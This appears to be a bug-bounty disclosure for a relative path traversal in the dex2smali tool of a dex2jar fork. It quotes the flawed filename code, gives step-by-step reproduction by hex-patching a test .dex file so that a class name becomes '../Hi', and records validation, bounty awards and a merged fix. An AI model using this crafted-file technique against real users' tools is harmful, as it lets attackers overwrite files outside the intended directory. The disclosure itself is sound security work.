Relative Path Traversal in thexxturboxx/dex2jar

Valid

Reported on

Feb 14th 2022


Description

This vulnerability is originally reported to pxb1988/dex2jar, but re-sending it again for maintained fork repository as requested.
dex2jar is a set of tools to work with android .dex and java .class files.
In these tools, there is a tool called "dex2smali", and this tool allows a malicious .dex to overwrite arbitrary .smali files on the system.

In com.googlecode.d2j.smali.baksmalidexfilevisitor.java of d2j-smali, the following code is used to determinate the output location of smali file. (Link)

                Path smaliFile = dir
                        .resolve(rebuildFileName(className.substring(1, className.length() - 1)) + ".smali");

As rebuildFileName isn't escaping / or . properly, it's possible to write arbitrary .smali files to outside of the output directory.

    protected String rebuildFileName(String s) {
        s = BaksmaliDumper.escapeId(s);
        s = s.replace('\\', '-');
        String low = s.toLowerCase();
        if (hases.contains(low)) {
            return s + "_d2j" + i++;
        } else {
            hases.add(low);
        }
        return s;
    }

Steps to reproduce

Patch based method:
1​. Download dex2jar and extract it: https://github.com/pxb1988/dex2jar/releases/tag/v2.1
2​. Download i200.dex from here: https://github.com/pxb1988/dex2jar/blob/d7a86110baba3f845973017021fb10664b1b90d2/dex-reader/src/test/resources/i200.dex
3​. Install xxd and patch command if you don't have it in your machine.
4​. Run xxd i200.dex > i200.txt.
5​. Save the following file as diff.patch:

33c33
< 00000200: 0141 0001 4200 074c 612f 4475 703b 0015  .A..B..La/Dup;..
---
> 00000200: 0141 0001 4200 074c 2e2e 2f48 693b 0015  .A..B..L../Hi;..

6​. Run patch i200.txt diff.patch
7​. Run xxd -r i200.txt i200-edited.dex
8​. Run d2j-dex2smali.sh i200-edited.dex.
9​. Hi.smali will be written into the outside of i200-edited-out directory.

Binary editor method:
1​. Download dex2jar and extract it: https://github.com/pxb1988/dex2jar/releases/tag/v2.1
2​. Download i200.dex from here: https://github.com/pxb1988/dex2jar/blob/d7a86110baba3f845973017021fb10664b1b90d2/dex-reader/src/test/resources/i200.dex
3​. Open it with the binary editor.
4​. Replace a/Dup to ../Hi.
5​. Save it.
6​. Run d2j-dex2smali.sh i200.dex.
7​. Hi.smali will be written into the outside of i200-out directory.

Impact

It's possible to overwrite arbitrary .smali files.

We are processing your report and will contact the thexxturboxx/dex2jar team within 24 hours. 3 months ago
Nico Mexis validated this vulnerability 3 months ago
RyotaK has been awarded the disclosure bounty
The fix bounty is now up for grabs
Nico Mexis confirmed that a fix has been merged on d064c1 3 months ago
Nico Mexis has been awarded the fix bounty
Jamie Slome
3 months ago

Admin


Nice work @ry0tak!

to join this conversation